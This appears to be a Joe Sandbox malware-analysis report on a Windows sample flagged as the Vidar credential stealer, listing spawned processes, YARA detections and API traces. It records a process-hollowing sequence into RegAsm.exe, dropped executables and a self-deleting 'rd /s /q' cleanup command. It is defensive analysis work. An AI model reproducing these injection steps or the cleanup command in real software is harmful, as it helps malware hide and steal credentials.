2024-09-28 03:24:21 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	23:22:57
Start date:	27/09/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0xe80000
File size:	5'661'736 bytes
MD5 hash:	021D0C04CB4DE2638DBD89DE7625F9B7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.2170671560.0000000004745000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.2170671560.0000000004745000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	23:22:57
Start date:	27/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	23:23:00
Start date:	27/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xff0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_EXEPWSH_DLAgent, Description: Detects SystemBC, Source: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	23:23:43
Start date:	27/09/2024
Path:	C:\ProgramData\GCGHJEBGHJ.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\GCGHJEBGHJ.exe"
Imagebase:	0x620000
File size:	380'456 bytes
MD5 hash:	687846A623C1FE1DA95F0FA2FE4479DF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	23:23:43
Start date:	27/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	23:23:43
Start date:	27/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x370000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	23:23:43
Start date:	27/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x3d0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	23:23:43
Start date:	27/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x380000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	23:23:43
Start date:	27/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x980000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	23:23:45
Start date:	27/09/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 2740 -s 1692
Imagebase:	0x830000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	23:23:45
Start date:	27/09/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 2740 -s 676
Imagebase:	0x830000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	23:23:50
Start date:	27/09/2024
Path:	C:\ProgramData\JKFIDGDHJE.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\JKFIDGDHJE.exe"
Imagebase:	0xd00000
File size:	5'661'736 bytes
MD5 hash:	8D556F35D2768D27B334D0E76D4D3295
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000013.00000002.2710042416.000000000459E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 29%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	23:23:50
Start date:	27/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	23:23:53
Start date:	27/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x7ff6ae840000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	23:23:53
Start date:	27/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x6d0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	23:23:53
Start date:	27/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x30000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	23:23:53
Start date:	27/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x530000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	23:23:53
Start date:	27/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x4d0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	23:23:53
Start date:	27/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x490000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	23:23:53
Start date:	27/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x860000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	23:23:53
Start date:	27/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xb10000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	23:23:53
Start date:	27/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xbd0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001D.00000002.2973194670.000000000118A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000001D.00000002.2971207252.000000000043A000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	23:23:54
Start date:	27/09/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\IJKFHDBKFCAA" & exit
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	23:23:54
Start date:	27/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	23:23:54
Start date:	27/09/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 10
Imagebase:	0x730000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	32.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	30%
Total number of Nodes:	20
Total number of Limit Nodes:	0

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 03742139 Relevance: 42.3, APIs: 10, Strings: 14, Instructions: 282
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000,00000000,00000000,00000004,00000000,00000000,037420AB,0374209B), ref: 037422A8
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 037422BB
Wow64GetThreadContext.KERNEL32(00000310,00000000), ref: 037422D9
ReadProcessMemory.KERNELBASE(0000009C,?,037420EF,00000004,00000000), ref: 037422FD
VirtualAllocEx.KERNELBASE(0000009C,?,?,00003000,00000040), ref: 03742328
WriteProcessMemory.KERNELBASE(0000009C,00000000,?,?,00000000,?), ref: 03742380
WriteProcessMemory.KERNELBASE(0000009C,00400000,?,?,00000000,?,00000028), ref: 037423CB
WriteProcessMemory.KERNELBASE(0000009C,-00000008,?,00000004,00000000), ref: 03742409
Wow64SetThreadContext.KERNEL32(00000310,01C50000), ref: 03742445
ResumeThread.KERNELBASE(00000310), ref: 03742454

Strings

GetThreadContext, xrefs: 03742213
VirtualAllocEx, xrefs: 03742239
ResumeThread, xrefs: 03742275
ress, xrefs: 037421C3
ReadProcessMemory, xrefs: 03742226
TerminateProcess, xrefs: 03742337
VirtualAlloc, xrefs: 03742200
WriteProcessMemory, xrefs: 0374224C
Load, xrefs: 03742177
GetP, xrefs: 037421BB
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 037422A7
SetThreadContext, xrefs: 0374225F
aryA, xrefs: 0374217F
CreateProcessA, xrefs: 037421ED

Memory Dump Source

Source File: 00000000.00000002.2169301733.0000000003741000.00000040.00000800.00020000.00000000.sdmp, Offset: 03741000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3741000_file.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$CreateProcessA$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
API String ID: 2687962208-1257834847
Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
Instruction ID: d6ddcd5e96dffed2548a485991d374017923b8562287ba21ea33011b7bc8f74f
Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
Instruction Fuzzy Hash: 3EB1F67660024AAFDB60CF68CC80BDA77A9FF8C714F158564EA0CAB341D774FA518B94

Function 01C21271 Relevance: 1.6, APIs: 1, Instructions: 58
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 01C212F8

Memory Dump Source

Source File: 00000000.00000002.2169118180.0000000001C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 01C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c20000_file.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: ca2c5b0b94bf0cc369b5eff9b8d17279e8aea9b24f73eac4abc7bf7f4a8ea20e
Instruction ID: 7e3969080eef3be297a1f27df5c741546ce020a280790b3e6034e1614090c645
Opcode Fuzzy Hash: ca2c5b0b94bf0cc369b5eff9b8d17279e8aea9b24f73eac4abc7bf7f4a8ea20e
Instruction Fuzzy Hash: 9B21FEB5D00359DFDB10DFAAC881AEEBBF4FF88310F10842AE919A3250D7759905CBA1

Function 01C21278 Relevance: 1.6, APIs: 1, Instructions: 56
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 01C212F8

Memory Dump Source

Source File: 00000000.00000002.2169118180.0000000001C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 01C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c20000_file.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: ff0d801226fc68d3def5ad619fe77c0f6e1ca2cb2ff190a4570db186d608463a
Instruction ID: 9894df39db8c2ec1aec17896286ca6bfa699d14e5ffdd48096e7c4fec3dc9846
Opcode Fuzzy Hash: ff0d801226fc68d3def5ad619fe77c0f6e1ca2cb2ff190a4570db186d608463a
Instruction Fuzzy Hash: 242113B5900359DFDB10DFAAC881AEEFBF4FF48310F10842AE919A3250C775A904CBA1

Analysis Process: RegAsm.exePID: 7152, Parent PID: 6900COMMON

Execution Graph

Execution Coverage:	6.5%
Dynamic/Decrypted Code Coverage:	20.8%
Signature Coverage:	4.3%
Total number of Nodes:	2000
Total number of Limit Nodes:	67

Executed Functions

Function 0041884E Relevance: 231.5, APIs: 121, Strings: 11, Instructions: 518
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(76210000,004171DE), ref: 00418862
GetProcAddress.KERNEL32 ref: 00418879
GetProcAddress.KERNEL32 ref: 00418890
GetProcAddress.KERNEL32 ref: 004188A7
GetProcAddress.KERNEL32 ref: 004188BE
GetProcAddress.KERNEL32 ref: 004188D5
GetProcAddress.KERNEL32 ref: 004188EC
GetProcAddress.KERNEL32 ref: 00418903
GetProcAddress.KERNEL32 ref: 0041891A
GetProcAddress.KERNEL32 ref: 00418931
GetProcAddress.KERNEL32 ref: 00418948
GetProcAddress.KERNEL32 ref: 0041895F
GetProcAddress.KERNEL32 ref: 00418976
GetProcAddress.KERNEL32 ref: 0041898D
GetProcAddress.KERNEL32 ref: 004189A4
GetProcAddress.KERNEL32 ref: 004189BB
GetProcAddress.KERNEL32 ref: 004189D2
GetProcAddress.KERNEL32 ref: 004189E9
GetProcAddress.KERNEL32 ref: 00418A00
GetProcAddress.KERNEL32 ref: 00418A17
GetProcAddress.KERNEL32 ref: 00418A2E
GetProcAddress.KERNEL32 ref: 00418A45
GetProcAddress.KERNEL32 ref: 00418A5C
GetProcAddress.KERNEL32 ref: 00418A73
GetProcAddress.KERNEL32 ref: 00418A8A
GetProcAddress.KERNEL32 ref: 00418AA1
GetProcAddress.KERNEL32 ref: 00418AB8
GetProcAddress.KERNEL32 ref: 00418ACF
GetProcAddress.KERNEL32 ref: 00418AE6
GetProcAddress.KERNEL32 ref: 00418AFD
GetProcAddress.KERNEL32 ref: 00418B14
GetProcAddress.KERNEL32 ref: 00418B2B
GetProcAddress.KERNEL32 ref: 00418B42
GetProcAddress.KERNEL32 ref: 00418B59
GetProcAddress.KERNEL32 ref: 00418B70
GetProcAddress.KERNEL32 ref: 00418B87
GetProcAddress.KERNEL32 ref: 00418B9E
GetProcAddress.KERNEL32 ref: 00418BB5
GetProcAddress.KERNEL32 ref: 00418BCC
GetProcAddress.KERNEL32 ref: 00418BE3
GetProcAddress.KERNEL32 ref: 00418BFA
GetProcAddress.KERNEL32 ref: 00418C11
GetProcAddress.KERNEL32 ref: 00418C28
GetProcAddress.KERNEL32(CreateProcessA), ref: 00418C3E
GetProcAddress.KERNEL32(GetThreadContext), ref: 00418C54
GetProcAddress.KERNEL32(ReadProcessMemory), ref: 00418C6A
GetProcAddress.KERNEL32(VirtualAllocEx), ref: 00418C80
GetProcAddress.KERNEL32(ResumeThread), ref: 00418C96
GetProcAddress.KERNEL32(WriteProcessMemory), ref: 00418CAC
GetProcAddress.KERNEL32(SetThreadContext), ref: 00418CC2
LoadLibraryA.KERNEL32(004171DE), ref: 00418CD3
LoadLibraryA.KERNEL32 ref: 00418CE4
LoadLibraryA.KERNEL32 ref: 00418CF5
LoadLibraryA.KERNEL32 ref: 00418D06
LoadLibraryA.KERNEL32 ref: 00418D17
LoadLibraryA.KERNEL32 ref: 00418D28
LoadLibraryA.KERNEL32 ref: 00418D39
LoadLibraryA.KERNEL32 ref: 00418D4A
LoadLibraryA.KERNEL32(dbghelp.dll), ref: 00418D5A
GetProcAddress.KERNEL32(751E0000), ref: 00418D75
GetProcAddress.KERNEL32 ref: 00418D8C
GetProcAddress.KERNEL32 ref: 00418DA3
GetProcAddress.KERNEL32 ref: 00418DBA
GetProcAddress.KERNEL32 ref: 00418DD1
GetProcAddress.KERNEL32(70240000), ref: 00418DF0
GetProcAddress.KERNEL32 ref: 00418E07
GetProcAddress.KERNEL32 ref: 00418E1E
GetProcAddress.KERNEL32 ref: 00418E35
GetProcAddress.KERNEL32 ref: 00418E4C
GetProcAddress.KERNEL32 ref: 00418E63
GetProcAddress.KERNEL32 ref: 00418E7A
GetProcAddress.KERNEL32 ref: 00418E91
GetProcAddress.KERNEL32(753A0000), ref: 00418EAC
GetProcAddress.KERNEL32 ref: 00418EC3
GetProcAddress.KERNEL32 ref: 00418EDA
GetProcAddress.KERNEL32 ref: 00418EF1
GetProcAddress.KERNEL32 ref: 00418F08
GetProcAddress.KERNEL32(76310000), ref: 00418F27
GetProcAddress.KERNEL32 ref: 00418F3E
GetProcAddress.KERNEL32 ref: 00418F55
GetProcAddress.KERNEL32 ref: 00418F6C
GetProcAddress.KERNEL32 ref: 00418F83
GetProcAddress.KERNEL32 ref: 00418F9A
GetProcAddress.KERNEL32(76910000), ref: 00418FB9
GetProcAddress.KERNEL32 ref: 00418FD0
GetProcAddress.KERNEL32 ref: 00418FE7
GetProcAddress.KERNEL32 ref: 00418FFE
GetProcAddress.KERNEL32 ref: 00419015
GetProcAddress.KERNEL32 ref: 0041902C
GetProcAddress.KERNEL32 ref: 00419043
GetProcAddress.KERNEL32 ref: 0041905A
GetProcAddress.KERNEL32 ref: 00419071
GetProcAddress.KERNEL32(75B30000), ref: 0041908C
GetProcAddress.KERNEL32 ref: 004190A3
GetProcAddress.KERNEL32 ref: 004190BA
GetProcAddress.KERNEL32 ref: 004190D1
GetProcAddress.KERNEL32 ref: 004190E8
GetProcAddress.KERNEL32(75670000), ref: 00419103
GetProcAddress.KERNEL32 ref: 0041911A
GetProcAddress.KERNEL32(76AC0000), ref: 00419135
GetProcAddress.KERNEL32 ref: 0041914C
GetProcAddress.KERNEL32(6F4E0000), ref: 0041916B
GetProcAddress.KERNEL32 ref: 00419182
GetProcAddress.KERNEL32 ref: 00419199
GetProcAddress.KERNEL32 ref: 004191B0
GetProcAddress.KERNEL32 ref: 004191C7
GetProcAddress.KERNEL32 ref: 004191DE
GetProcAddress.KERNEL32 ref: 004191F5
GetProcAddress.KERNEL32 ref: 0041920C
GetProcAddress.KERNEL32(HttpQueryInfoA), ref: 00419222
GetProcAddress.KERNEL32(InternetSetOptionA), ref: 00419238
GetProcAddress.KERNEL32(75AE0000), ref: 00419253
GetProcAddress.KERNEL32 ref: 0041926A
GetProcAddress.KERNEL32 ref: 00419281
GetProcAddress.KERNEL32 ref: 00419298
GetProcAddress.KERNEL32(76300000), ref: 004192B3
GetProcAddress.KERNEL32(6FD50000), ref: 004192CE
GetProcAddress.KERNEL32 ref: 004192E5
GetProcAddress.KERNEL32 ref: 004192FC
GetProcAddress.KERNEL32 ref: 00419313
GetProcAddress.KERNEL32(6C910000,SymMatchString), ref: 0041932D

Strings

HttpQueryInfoA, xrefs: 00419212
ReadProcessMemory, xrefs: 00418C5A
SetThreadContext, xrefs: 00418CB2
InternetSetOptionA, xrefs: 00419228
dbghelp.dll, xrefs: 00418D50
VirtualAllocEx, xrefs: 00418C70
ResumeThread, xrefs: 00418C86
CreateProcessA, xrefs: 00418C2E
GetThreadContext, xrefs: 00418C44
SymMatchString, xrefs: 00419327
WriteProcessMemory, xrefs: 00418C9C

Memory Dump Source

Source File: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2710203161.0000000000980000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009BF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009C4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009E3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A9B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B5C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B6E000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: CreateProcessA$GetThreadContext$HttpQueryInfoA$InternetSetOptionA$ReadProcessMemory$ResumeThread$SetThreadContext$SymMatchString$VirtualAllocEx$WriteProcessMemory$dbghelp.dll
API String ID: 2238633743-2740034357
Opcode ID: 30cc383f13f7f75b177b6ad21a80947fce1d4866b524c087515693054bad4a3f
Instruction ID: 1108216a4ea0851e432e48973e1a5d8844aefb31b152e1ff922822aeea4db5b2
Opcode Fuzzy Hash: 30cc383f13f7f75b177b6ad21a80947fce1d4866b524c087515693054bad4a3f
Instruction Fuzzy Hash: 0E52BF76502305AFEB029FA1FD49A253FA3F70D70371091AAE94193630EFB65864EF94

Function 00405482 Relevance: 72.3, APIs: 25, Strings: 16, Instructions: 573
stringnetworkmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00416F8F,004366AE,?,?,?,?,0041848C), ref: 0041050D

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417535), ref: 00410538

Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

lstrlenA.KERNEL32(?), ref: 00405519

Part of subcall function 00411E5D: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,00000000,00B5CC68,?,?,?,004128A1,?,?,00000000), ref: 00411E7D
Part of subcall function 00411E5D: GetProcessHeap.KERNEL32(00000000,?,?,?,?,004128A1,?,?,00000000), ref: 00411E8A
Part of subcall function 00411E5D: HeapAlloc.KERNEL32(00000000,?,?,?,004128A1,?,?,00000000), ref: 00411E91

StrCmpCA.SHLWAPI(?,0043694F,00436943,00436942,0043693F), ref: 00405588
InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004055AA
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004056C0
HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00405704
InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00405736

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004174FD,004366B7), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00416FCE,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 004105BD

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00416FB0,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00416FB0,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00416FB0,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 00410650

